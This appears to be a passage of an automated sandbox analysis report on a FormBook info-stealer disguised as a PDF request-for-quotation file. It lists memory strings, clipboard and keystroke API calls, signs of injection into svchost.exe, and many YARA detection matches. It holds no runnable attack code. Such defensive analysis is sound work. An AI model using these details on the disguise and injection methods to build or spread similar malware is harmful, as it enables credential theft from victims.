          Source: explorer.exe, 00000003.00000002.4776588202.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
          Source: explorer.exe, 00000003.00000000.2348289293.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000002.4776588202.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
          Source: explorer.exe, 00000003.00000000.2348289293.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000003.00000000.2348289293.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
          Source: explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
          Source: explorer.exe, 00000003.00000003.2981042434.000000000C08A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4780334322.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980858882.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2351958536.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
          Source: explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
          Source: explorer.exe, 00000003.00000003.2981042434.000000000C08A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4780334322.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980858882.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2351958536.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
          Source: explorer.exe, 00000003.00000000.2351958536.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4780167257.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000003.2979322118.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348802491.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
          Source: explorer.exe, 00000003.00000003.2981042434.000000000C08A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4780334322.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980858882.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2351958536.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
          Source: explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00ABEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00ABEAFF
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00ABED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00ABED6A
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00ABEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00ABEAFF
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AAAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00AAAA57
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AD9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00AD9576

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4776081741.0000000008811000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: RFQ PC25-1301 Product Specifications_PDF.exe PID: 2940, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 6444, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
          Source: Process Memory Space: help.exe PID: 5132, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Binary is likely a compiled AutoIt script file
          Source: RFQ PC25-1301 Product Specifications_PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_eb702255-2
          Source: RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f146d9d4-d
          Source: RFQ PC25-1301 Product Specifications_PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e9a3231a-8
          Source: RFQ PC25-1301 Product Specifications_PDF.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_63cfc7cb-9
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: RFQ PC25-1301 Product Specifications_PDF.exe
          Source: initial sampleStatic PE information: Filename: RFQ PC25-1301 Product Specifications_PDF.exe
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A330 NtCreateFile,2_2_0041A330
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A3E0 NtReadFile,2_2_0041A3E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A460 NtClose,2_2_0041A460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A510 NtAllocateVirtualMemory,2_2_0041A510
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A32C NtCreateFile,2_2_0041A32C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A383 NtCreateFile,2_2_0041A383
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A45A NtClose,2_2_0041A45A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A50A NtAllocateVirtualMemory,2_2_0041A50A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A58A NtAllocateVirtualMemory,2_2_0041A58A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A58C NtAllocateVirtualMemory,2_2_0041A58C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B60 NtClose,LdrInitializeThunk,2_2_03272B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BF0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_03272BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AD0 NtReadFile,LdrInitializeThunk,2_2_03272AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F30 NtCreateSection,LdrInitializeThunk,2_2_03272F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FB0 NtResumeThread,LdrInitializeThunk,2_2_03272FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F90 NtProtectVirtualMemory,LdrInitializeThunk,2_2_03272F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FE0 NtCreateFile,LdrInitializeThunk,2_2_03272FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_03272EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E80 NtReadVirtualMemory,LdrInitializeThunk,2_2_03272E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_03272D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D10 NtMapViewOfSection,LdrInitializeThunk,2_2_03272D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03272DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DD0 NtDelayExecution,LdrInitializeThunk,2_2_03272DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03272C70
